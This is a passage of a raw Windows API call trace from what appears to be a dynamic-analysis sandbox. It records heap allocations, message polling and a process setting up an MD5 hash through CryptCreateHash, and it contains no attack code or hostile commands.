lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0265.544] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0265.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0265.544] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0265.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0265.544] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.545] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.545] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0265.545] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0265.545] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0265.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0265.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0265.545] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0265.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0265.546] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0265.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0265.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0265.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0265.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0265.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0265.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0265.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0265.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0265.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0265.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0265.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0265.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0265.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0265.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0265.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0265.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0265.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.547] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0265.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0265.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0265.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0265.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0265.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0265.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0265.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0265.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0265.548] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0265.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0265.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0265.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0265.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0265.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0265.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.549] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0265.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0265.549] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0265.549] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0265.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.549] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0265.549] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0265.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0265.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.550] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.550] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0265.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.550] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0265.550] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0265.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0265.550] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0265.550] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0265.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0265.551] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0265.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0265.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0265.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0265.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0265.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0265.551] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.551] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0265.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0265.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.551] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0265.551] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0265.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0265.552] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0265.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0265.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0265.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0265.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0265.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0265.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51e50, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0265.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0265.552] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0265.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0265.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0265.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0265.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0265.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0265.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0265.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0265.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0265.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0265.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0265.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0265.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0265.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0265.555] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0265.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0265.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0265.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0265.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0265.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0265.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0265.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0265.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0265.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0265.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0265.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0265.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0265.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0265.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0265.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0265.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0265.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0265.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0265.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0265.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0265.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0265.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0265.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0265.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0265.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0265.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0265.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0265.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0265.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0265.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0265.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0265.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0265.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0265.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0265.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0265.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0265.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0265.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0265.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0265.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0265.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0265.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0265.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0265.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0265.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0265.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0265.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0265.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0265.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0265.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0265.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0265.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0265.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0265.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0265.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0265.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0265.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0265.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0265.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0265.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0265.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0265.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0265.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0265.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0265.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0265.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14f50 | out: hHeap=0x970000) returned 1 [0265.558] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0265.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0265.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0265.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0265.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0265.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0265.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0265.559] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0265.559] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.559] RtlAllocateHeap 